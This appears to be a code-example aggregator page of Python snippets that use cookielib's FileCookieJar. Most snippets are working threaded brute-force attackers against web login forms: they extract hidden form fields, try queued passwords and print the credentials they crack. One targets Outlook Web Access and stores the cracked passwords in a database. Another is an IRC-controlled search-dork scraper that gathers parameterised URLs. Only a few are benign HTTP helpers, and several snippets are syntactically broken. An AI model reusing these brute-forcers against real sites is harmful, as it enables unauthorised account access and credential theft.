Beispiel #1
0
def search(inurl, maxc):
  counter = 0
  while counter < int(maxc):
    jar = cookielib.FileCookieJar("cookies")
    query = inurl+'+site:'+site
    results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(counter)+'&src=hmp'
    request_web = urllib2.Request(results_web)
    agent = random.choice(header)
    request_web.add_header('User-Agent', agent)
    opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
    text = opener_web.open(request_web).read()
    stringreg = re.compile('(?<=href=")(.*?)(?=")')
    names = stringreg.findall(text)
    counter += 1
    for name in names:
      if name not in urls:
  if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
    pass
  elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
    pass
  else:
    urls.append(name)
    
  tmplist = []
  finallist = []
  s.send("PRIVMSG %s :%s%s\r\n" % (chan, "[+] Urls collected: ", len(urls)))
  for u in urls:
    try:
      host = u.split("/", 3)
      domain = host[2]
      if domain not in tmplist and "=" in u:
  finallist.append(u)
  tmplist.append(domain)
    except:
Beispiel #2
0
    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            jar = cookielib.FileCookieJar("cookies") # Set up our cookie jar using the FileCookieJar class that will store the cookies in the cookies file
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) # Next we initialize our urllib2 opener, passing in the initialized cookie jar, which tells urllib2 to pass off any cookies to it

            response = opener.open(target_url)
            page = response.read()
            print("[*] Trying %s:%s (%d left)" % (self.username,brute,self.password_q.qsize()))

            # Parse out the hidden fields. When we have the raw HTML, we pass it off
            # to our HTML parser and call its feed method, which returns a dictionary
            # of all of the retrieved form elements.
            parser = BruteParser()
            parser.feed(page)

            post_tags = parser.tag_results

            # Add our username and password fields
            post_tags[username_field] = self.username
            post_tags[password_field] = brute

            # Next we URL encode the POST variables, and then pass them in our subsequent HTTP request.
            login_data = urllib.urlencode(post_tags)
            login_response = opener.open(target_post, login_data)

            login_result = login_response.read()

            # Check if our login attempt was successful
            if success_check in login_result:
                self.found = True
                print("[*] Bruteforce successful.")
                print("[*] Username: %s" %  username)
                print("[*] Password: %s" % brute)
                print("[*] Waiting for the other threads to exit...")
Beispiel #3
0
    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)

            page = response.read()

            print "Trying:(%s=>%s) [%d left]" % (self.username, brute,
                                                 self.password_q.qsize())

            #初始我们写的类并解析页面
            parser = BruterParser()
            parser.feed(page)
            post_tags = parser.tag_results

            #构造参数
            post_tags[username_field] = self.username
            post_tags[password_field] = brute

            login_data = urllib.urlencode(post_tags)
            #print login_data
            login_response = opener.open(target_post, login_data)
            login_result = login_response.read()

            if false_check not in login_result:
                self.found = True

                print "\033[1;32;41m[*] Brute Bruteforce successful"
                print "\033[1;32;41m[*] Username=%s" % username
                print "\033[1;32;41m[*] Password=%s" % brute
                print "\033[1;32;41m[*] Waiting for other threads exit...\033[0m"
Beispiel #4
0
 def web_bruter(self):
     while not self.password_q.empty() and not self.found:
         brute = self.password_q.get().rstrip()
         jar = cookielib.FileCookieJar("cookies")
         opener = urllib.request.build_opener(
             urllib.HTTPCookieProcessor(jar))
         response = opener.open(self.target_get_form_url)
         page = response.read()
         print(
             f"[*] Trying {self.username} : {brute} ({self.password_q.qsize()} Left)"
         )
         # parse out the hidden fields
         parser = self.parser_class()
         parser.feed(page)
         post_tags = parser.tag_results
         # add our username and password fields
         post_tags[self.username_field] = self.username
         post_tags[self.password_field] = brute
         login_data = urllib.parse.urlencode(post_tags)
         login_response = opener.open(self.target_post_form_url, login_data)
         login_result = login_response.read()
         if self.success_checker(login_result):
             self.found = True
             print("[*] Bruteforce Successful!")
             print(f"[*] Username : {self.username}")
             print(f"[*] Password : {brute}")
             print("[*] Waiting for other threads to exit!")
    def get_html(self, url):
        # utf-8 encode unicode url
        if isinstance(url, unicode):
            url = url.encode('utf-8')

        #Enabling cookies ADDED GR
        jar = cookielib.FileCookieJar("cookies")
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

        # set request
        self.request = urllib2.Request(
                        url,
                        headers=self.headers)
        # do request
        try:
            # self.result = urllib2.urlopen(
            #                 self.request,
            #                 timeout=self.config.http_timeout)
            
            self.result = opener.open(
                            self.request,
                            timeout=self.config.http_timeout)
        except Exception:

            self.result = None

        # read the result content
        if self.result is not None:
            return self.result.read()
        return None
Beispiel #6
0
 def web_bruter(self):
     while not self.password_q.empty() and not self.found:
         brute = self.password_q.get().rstrip()
         jar = cookielib.FileCookieJar("cookies")#cerezleri cerezler dosyasinda depolayacak olan filecookiejar sinifini kullanarak cerez kavanozumuzu kurariz.
         opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) # neyi gonderecegine dair
         
         response = opener.open(target_url)
         
         page = response.read()
         
         print ("Trying: %s : %s (%d left)" % (self.username,brute,self.password_q.qsize()))
         #ilk istek atilir ham html oldgundan onu parsera atariz 
         # parse out the hidden fields
         parser = BruteParser()
         parser.feed(page)#geri alinan tum form ogelerinin sozlugunu donduren feed yontemini cagiririz.
         
         post_tags = parser.tag_results
         
         # add our username and password fields
         #ayristirma bitince kulllanici ad ve sifre alanlarina kaba zorlama  girisimizle degistiyoruz 
         post_tags[username_field] = self.username
         post_tags[password_field] = brute
         
         login_data = urllib.urlencode(post_tags)#sonra urlyi post degiskenlerini kodluyorz ve sonra onlari sonraki http istegimizde iletiyoruz
         login_response = opener.open(target_post, login_data)
         
         login_result = login_response.read()
         
         if success_check in login_result:#kimlik dogrulamanin basarili olup olmadigini test ediyoruz
             self.found = True
             print ("[*] Bruteforce successful.")
             print ("[*] Username: %s" % username)
             print ("[*] Password: %s" % brute)
             print ("[*] Waiting for other threads to exit...")
Beispiel #7
0
    def generate_http_requests(self, url, count=100, worker_threads=20):
        self.debug("Generating {0} http requests against {1}".format(
            count, url))
        jar = cookielib.FileCookieJar("cookies")
        handler = urllib2.HTTPCookieProcessor(jar)
        opener = urllib2.build_opener(handler)
        urllib2.install_opener(opener)
        response_futures = []
        with ThreadPoolExecutor(max_workers=worker_threads) as executor:
            for _ in range(count):
                response_futures.append(executor.submit(urllib2.urlopen, url))

        responses = []
        for response in response_futures:
            http_response = response.result()
            try:
                http_error_code = http_response.getcode()
                if http_error_code == 200:
                    result = "{0}".format(http_response.read().rstrip())
                    self.debug("Request response: " + result)
                    responses.append(result)
                else:
                    raise Exception("Error code " + http_error_code +
                                    " found when sending " +
                                    str(worker_threads) +
                                    " concurrent requests to " + url)
            finally:
                http_response.close()
        return responses
Beispiel #8
0
    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)
            page = response.read()

            print "Trying: %s : %s (%d left)" % (self.username, brute,
                                                 self.password_q.qsize())

            # Parse out the hidden fields
            parser = BruteParser()
            parser.feed(page)
            post_tags = parser.tag_results

            # Add our username and password fields
            post_tags[username_field] = self.username
            post_tags[password_field] = brute

            login_data = urllib.urlencode(post_tags)
            login_response = opener.open(target_post, login_data)
            login_result = login_response.read()

            if success_check in login_result:
                self.found = True

                print "[*] Bruteforce successful."
                print "[*] Username: %s" % username
                print "[*] Password: %s" % brute
                print "[*] Waiting for other threads to exit..."
    def web_bruter(self):
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            while True:
                try:
                    response = opener.open(target_url)
                    page = response.read()
                    break
                except Exception, e:
                    print "Caught", e
                    print "Retrying"

            print "Trying: %s : %s (%d left)" % (self.username, brute,
                                                 self.password_q.qsize())

            # parse out the hidden fields
            parser = BruteParser()
            parser.feed(page)

            post_tags = parser.tag_results

            # add out username and password fields
            post_tags[username_field] = self.username
            post_tags[password_field] = brute

            login_data = urllib.urlencode(post_tags)
            try:
                login_response = opener.open(target_post, login_data)
                login_result = login_response.read()
            except urllib2.HTTPError, e:
                print e
                login_result = ""
Beispiel #10
0
    def web_bruter(self):
        '''brute some web'''
        if self.args.verbose > 1:
            print 'Starting %s' % threading.current_thread().name

        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            jar = cookielib.FileCookieJar('cookies')
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            response = opener.open(self.target_url)
            page = response.read()
            if self.args.verbose > 0:
                print 'Trying: %s : %s (%d left)' % (self.username, brute,
                                                     self.password_q.qsize())
            parser = BruteParser()
            parser.feed(page)
            post_tags = parser.tag_results
            post_tags[self.username_field] = self.username
            post_tags[self.password_field] = brute
            login_data = urllib.urlencode(post_tags)
            login_response = opener.open(self.target_post, login_data)
            login_result = login_response.read()
            if self.success_check in login_result:
                self.found = True
                print '[*] Bruteforce successful'
                print '[*] Username: %s' % self.username
                print '[*] Password: %s' % brute
                print '[*] Waiting for other threads to exit...'
Beispiel #11
0
    def web_bruter(self):
        filename = target_url.split("//")[1]
        filename = filename.split("/")[0] + ".txt"
        while not self.password_q.empty() and not self.find:
            brute = self.password_q.get().rstrip('\n')  #去除字符串末尾的空格
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            response = opener.open(target_url)
            page = response.read()
            print "爆破用户:%s ------> 尝试密码:%s -------> 剩余密码数:%s" % (
                self.username, brute, self.password_q.qsize())

            parser = BruteParser()
            parser.feed(page)  #返回标签的集合
            post_tags = parser.tag_results

            post_tags[username_tag] = self.username
            post_tags[password_tag] = brute
            # print post_tags
            login_data = urllib.urlencode(post_tags)
            login_response = opener.open(target_post, login_data)
            login_result = login_response.headers  # 这个一部因目标而异
            s_login_result = int(login_result["Content-Length"])
            # print s_login_result
            # print login_result["Content-Length"]
            if s_login_result != 60:
                self.find = True
                # print login_result["Content-Length"]
                print "恭喜大佬爆破成功!!!"
                print "用户名%s它的密码为:%s" % (self.username, brute)
                print "等待爆破线程退出........"
                f = open(filename, 'a')
                content = self.username + ":" + brute + "\n"
                f.writelines(content)
                f.close()
Beispiel #12
0
def confirm_password(user_queue):
    while not user_queue.empty():
        ori_message = user_queue.get()
        ori_email = ori_message['email']
        email = ori_email.rstrip().lstrip()
        if email is not None:
            username = ori_message['user_name']
            password = ori_message['password']
            jar =  cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
                    
            response = opener.open(target_ip)
            parser = BruterParse()
            parser.feed(response.read())
            post_tag = parser.tag_results
            post_tag['username'] = username
            post_tag['password'] = password
                    
            login_data = urllib.urlencode(post_tag)
            login_response = opener.open(target_ip + '/owa/auth.owa', login_data)
            login_result = login_response.read()
        
            if login_response.code == 200 and login_result.find('id="signInErrorDiv"') == -1:
                print "login successful: username:%s  password: %s" % (post_tag['username'], post_tag['password'])
                conn2 = psycopg2.connect(database = 'haha', user = '******', password = '******', port = '5432', host = '192.168.70.36')
                cur2 = conn2.cursor()                
                cur2.execute("update employee set password = '******' where email = '%s'" % (password, ori_email))
                conn2.commit()
                cur2.close()
                conn2.close()
            else:
                print "login failed!!!: : username:%s  password: %s"  % (post_tag['username'], post_tag['password'])
Beispiel #13
0
    def web_brute(self):
        while not self.passwd.empty() and not self.found:
            brt = self.passwd.get().rstrip()
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            replies = opener.open(target_url)
            page = replies.read()

            print "Currently working on: %s : %s (%d left)" % (
                self.username, brt, self.passwd.qsize())

            parser = BruteParser()
            parser.feed(page)

            post = parser.tag_results
            post[username_placeholder] = self.username
            post[password_placeholder] = brt

            login = urllib.urlencode(post)
            login_reply = opener.open(target_post, login)
            result = login_reply.read()
            if success_check in result:
                self.found = 1
                print "login success, under %s, %s" % (self.username, brt)
Beispiel #14
0
    def __init__(self,
                 callerthread=None,
                 accessId=None,
                 accessKey=None,
                 endpoint=None,
                 cookieFile='cookies.txt',
                 proxy=None,
                 apirev=1):
        self.session = requests.Session()
        self.session.auth = (accessId, accessKey)
        if accessId == None:
            self.session.auth = (ENV_SUMO_ACCESS_ID, ENV_SUMO_ACCESS_KEY)
        self.session.headers = {
            'content-type': 'application/json',
            'accept': 'application/json'
        }
        cj = cookielib.FileCookieJar(cookieFile)
        self.session.cookies = cj
        self.proxies = {}
        if not proxy == None:
            self.proxies = {'https': proxy}
        elif ENV_SUMO_API_PROXY in os.environ:
            self.proxies = {'https': os.environ[ENV_SUMO_API_PROXY]}

        self.endpoint = SUMO_ENDPOINTS['US2']
        if not endpoint == None: self.endpoint = endpoint
        elif ENV_SUMO_API_ENDPOINT in os.environ:
            self.endpoint = os.environ[ENV_SUMO_API_ENDPOINT]

        if apirev > 1:
            self.endpoint = self.endpoint.replace(
                '/api/v1',
                '/api/v' + str(apirev))  #hack, we didn't ramp all APIs to V2?

        self.callerthread = callerthread
Beispiel #15
0
    def __init__(self, username=None, password=None, logger=None):

        self.username = username

        self.password = password

        # self.log = logger

        cj = cookielib.FileCookieJar(__cookies__)

        cp = urllib2.HTTPCookieProcessor(cj)

        opener = urllib2.build_opener(cp)

        opener.addheaders = [

            ('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.24 ' \

             '(KHTML, like Gecko) Chrome/19.0.1056.0 Safari/535.24'),

            ]

        self._cookiejar = cj

        self._opener = opener

        self.urlopen = self._opener.open
    def __init__(self,
                 accessId,
                 accessKey,
                 parent_deployment,
                 endpoint="https://organizations.sumologic.com/api",
                 cookieFile='cookies_org.txt',
                 log_level='info',
                 log_file=None):

        self.log_level = log_level
        self.set_log_level(self.log_level)
        if log_file:
            logzero.logfile(str(log_file))
        self.session = requests.Session()
        self.session.auth = requests.auth.HTTPBasicAuth(accessId, accessKey)
        self.session.headers = {
            'content-type': 'application/json',
            'accept': 'application/json'
        }
        cj = cookielib.FileCookieJar(cookieFile)
        self.session.cookies = cj
        self.endpoint = endpoint
        self.parent_deployment = parent_deployment
        if self.endpoint[-1:] == "/":
            raise Exception("Endpoint should not end with a slash character")
	def web_bruter(self):

		while not self.password_q.empty() and not self.found:
			brute = self.password_q.get().strip()
			jar = cookielib.FileCookieJar("cookies")
			opener = urllib.request.build_opener(urllib..request.HTTPCookieProcessor(jar))

			response = opener.open(target_url)

			page = response.read()

			print("Try: {0} : {1} ({2})".format(self.username, brute, self.password_q.qsize() ))

			# parse hidden fields
			parser = Parse_all()
			parser.feed(page)

			post_tags = parser.tag_results

			# post username and password (inputs)
			post_tags[username_input] = self.username
			post_tags[password_input] = brute

			login_data = urllib.parse.urlencode(post_tags)
			login_response = opener.open(target_post, login_data)

			login_result = login_response.read()

			if check in login_result:
				self.found = True

				print("[*]Bruteforce success. Results:")
				print("[*]Username: {0}".format(username))
				print("[*]Password: {0}".format(brute))
				print("[*]Other threads are exiting..")
Beispiel #18
0
    def web_brute(self):
        while not self.password_list.empty() and not self.found:
            brute = self.password_list.get().rstrip()
            jar = cookielib.FileCookieJar('cookies')
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            res = opener.open(target_url)
            page = res.read()

            print('Trying: %s:%s (%d left)' %
                  (self.username, brute, self.password_list.qsize()))

            parser = BruteParser()
            parser.feed(page)

            post_tags = parser.tag_results

            post_tags[username_field] = self.username
            post_tags[password_field] = brute
            login_data = urllib.urlencode(post_tags)
            print(login_data)

            login_res = opener.open(target_post, login_data)
            login_result = login_res.read()

            if '密码不正确' not in login_result:
                self.found = True
                print('[*] Brute successful by %s:%s' % (self.username, brute))
Beispiel #19
0
    def __init__(self,
                 headers=None,
                 cookies=None,
                 auth=None,
                 timeout=None,
                 proxies=None,
                 hooks=None,
                 params=None,
                 config=None,
                 keep_alive=True):

        self.headers = headers or {}
        self.cookies = cookies or {}
        self.auth = auth
        self.timeout = timeout
        self.proxies = proxies or {}
        self.hooks = hooks or {}
        self.params = params or {}
        self.config = config or {}
        self.keep_alive = keep_alive

        for (k, v) in defaults.items():
            self.config.setdefault(k, v)

        # Set up a CookieJar to be used by default
        self.cookies = cookielib.FileCookieJar()
Beispiel #20
0
def get_cookies_opener(filename=None):
    """Open a cookies file and return a urllib2 opener object"""
    cookie_jar = cookielib.FileCookieJar()
    if filename:
        cookie_jar.load(filename)
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
    opener.cookie_jar = cookie_jar
    return opener
Beispiel #21
0
def cxeSearch(go_inurl,go_site,go_cxe,go_ftype,maxc):
	uRLS = []
	counter = 0
	   	while counter &lt; int(maxc):
			  	jar = cookielib.FileCookieJar("cookies")
				query = 'q='+go_inurl+'+'+go_site+'+'+go_ftype
				results_web = 'http://www.google.com/cse?'+go_cxe+'&amp;'+query+'&amp;num='+str(gnum)+'&amp;hl=en&amp;lr=&amp;ie=UTF-8&amp;start=' + repr(counter) + '&amp;sa=N'
				request_web = urllib2.Request(results_web)
Beispiel #22
0
    def html_brute_forcer(self):
        while not passwd_q.empty() and not self.found:
            #Enable cookies for the session
            cookiejar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(cookiejar))

            #This allows urlopen to use cookiejar
            urllib2.install_opener(opener)

            request = urllib2.Request(target_url, headers=headers)
            response = urllib2.urlopen(request)

            #The response is in bytes. Convert to string and remove b''
            page = str(response.read())[2:-1]

            #Parse HTML Form
            parsed_html = BruteParser()
            parsed_html.feed(page)

            if username_field in parsed_html.parsed_results.keys(
            ) and password_field in parsed_html.parsed_results.keys():
                parsed_html.parsed_results[username_field] = self.username
                parsed_html.parsed_results[password_field] = self.passwd_q.get(
                )

                print(
                    "[*] Attempting {self.username}/{parsed_html.parsed_results[password_field]}"
                )

                #Must be bytes
                post_data = urllib.urlencode(
                    parsed_html.parsed_results).encode()

                brute_force_request = urllib2.Request(post_url,
                                                      headers=headers)
                brute_force_response = urllib2.urlopen(brute_force_request,
                                                       data=post_data)

                #The response is in bytes. Convert to string and remove b''
                brute_force_page = str(brute_force_response.read())[2:-1]

                #Parse HTML Form
                brute_force_parsed_html = BruteParser()
                brute_force_parsed_html.feed(brute_force_page)

                if not brute_force_parsed_html.parsed_results:
                    self.found = True
                    print("[*] Brute-Force Attempt is Successful!")
                    print("[*] Username: {self.username}")
                    print(
                        "[*] Password: {parsed_html.parsed_results[password_field]}"
                    )
                    print("[*] Done")
                    os._exit(0)
            else:
                print("[!] HTML Page is Invalid")
                break
Beispiel #23
0
    def cookie_jar(self):
        if not self._cookie_jar:
            self.log.warning("WARNING: Creating cookie jar")
            self._cookie_jar = cookielib.FileCookieJar()

            filename = "cookies_{0}_{1}.txt".format(getpass.getuser(),
                                                    self._scraper_name)
            self._cookie_jar.filename = os.path.join("/tmp", filename)

        return self._cookie_jar
Beispiel #24
0
 def __init__(self, accessId, accessKey, endpoint=None, cookieFile='cookies.txt'):
     self.session = requests.Session()
     self.session.auth = (accessId, accessKey)
     self.session.headers = {'content-type': 'application/json', 'accept': 'application/json'}
     cj = cookielib.FileCookieJar(cookieFile)
     self.session.cookies = cj
     if endpoint is None:
         self.endpoint = self._get_endpoint()
     else:
         self.endpoint = endpoint
Beispiel #25
0
	def web_bruter(self):
		while not self.password_q.empty() and not self.found:
			brute = self.password_q.get().rstrip()
			
			# TODO : ADD PROXIE MOD
			proxy = select_randomProxyFromFile("proxyFromWeb.txt")
			print "=> " +str(proxy)
			jar = cookielib.FileCookieJar("cookies")
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
			
			response = opener.open(target_url)

			page = response.read()
			print "Trying: %s : %s " % (self.username,brute)

			# parse out the hidden fields
			parser = BruteParser()
			parser.feed(page)

			post_tags = parser.tag_results

			# add our username and password fields
			post_tags[username_field] = self.username
			post_tags[password_field] = brute

			login_data = urllib.urlencode(post_tags)
			login_response = opener.open(target_post, login_data)
			login_result = login_response.read()

			# write html response in a tmp file
			resultFile = open("response.tmp", "w")
			resultFile.write(login_result)
			resultFile.close()

			# Looking for unusual response
			resultFile = open("response.tmp", "r")
			cmpt = 0
			for line in resultFile:
				cmpt += 1
			resultFile.close()

			if(cmpt < 3):
				print "[-] Strange response for password: %s" % brute
				failPassword = open("strangePassword.txt", "a")
				failPassword.write(str(password)+"\n")
				failPassword.close()

			if success_check in login_result:
				self.found = True
				print "--------------------------"
				print "[*] Bruteforce successful."
				print "[*] Username: %s" % username
				print "[*] Password: %s" % brute
				print "[*] Waiting for other threads to exit..."
Beispiel #26
0
 def getOpener(self):
     if not self.opener:
         url = self.getBaseUrl()
         if not url:
             raise InternalException('Base url is not defined!')
         cleared = re.sub(r"\W", r"_", url)
         jar = cookielib.FileCookieJar("cookies" + cleared +
                                       self.login_name)
         self.opener = urllib2.build_opener(
             urllib2.HTTPCookieProcessor(jar))
     return self.opener
Beispiel #27
0
    def __init__(self, **kwargs):

        # Set up a CookieJar to be used by default
        self.cookies = cookielib.FileCookieJar()

        # Map args from kwargs to instance-local variables
        map(lambda k, v: (k in self.__attrs__) and setattr(self, k, v),
            kwargs.iterkeys(), kwargs.itervalues())

        # Map and wrap requests.api methods
        self._map_api_methods()
Beispiel #28
0
    def __init__(self, ca_certs=None, verify_ssl=True):

        self.keyjar = KeyJar(verify_ssl=verify_ssl)

        self.request_args = {"allow_redirects": False}
        # self.cookies = {}
        self.cookiejar = cookielib.FileCookieJar()
        self.ca_certs = ca_certs
        if ca_certs:
            self.request_args["verify"] = verify_ssl
        else:
            self.request_args["verify"] = False
 def __init__(self, accessId, accessKey, endpoint=None, cookieFile='cookies.txt'):
     self.session = requests.Session()
     self.session.auth = (accessId, accessKey)
     self.session.headers = {'content-type': 'application/json', 'accept': 'application/json'}
     cj = cookielib.FileCookieJar(cookieFile)
     self.session.cookies = cj
     if endpoint is None:
         self.endpoint = self._get_endpoint()
     else:
         self.endpoint = endpoint
     if self.endpoint[-1:] == "/":
         raise Exception("Endpoint should not end with a slash character")
Beispiel #30
0
def create_cookies():
    jar = cookielib.FileCookieJar("cookies")
    browser = mechanize.Browser()
    browser.set_handle_robots(False)
    browser.set_cookiejar(jar)
    browser.open('https://auth.bethel.edu/cas/login')
    browser.select_form(
        nr=0)  # check yoursite forms to match the correct number
    browser['username'] = user  # use the proper input type=text name
    browser['password'] = password  # use the proper input type=password name
    browser.submit()
    return jar